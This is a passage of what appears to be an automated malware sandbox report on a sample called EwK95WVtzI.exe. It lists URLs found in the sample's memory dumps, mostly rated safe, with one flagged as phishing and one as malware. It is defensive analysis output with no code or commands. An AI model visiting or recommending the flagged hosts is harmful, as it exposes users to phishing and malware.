EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://gholographic.com/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.vitaindu.com/D3EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                                      unknown
                                                                                                                                                                      http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.elpro.si/wp-content/plugins/sitepress-multilingualEwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemenEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.ora-ito.com/EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077DC000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2032437115.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2785021069.00000000077E1000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.crcsi.org/XEwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://tickets.suresupport.com/faq/article-1596/enEwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.serviceplan.com/presse/news.htmlEwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.lrsuk.com/EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.aevga.com/Kw3EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.crcsi.org/eEwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/wika-partner/EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pubEwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://myropcb.com/login/EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.winhui.cn/template/default/img/fixedimg4.pngEwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.9EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 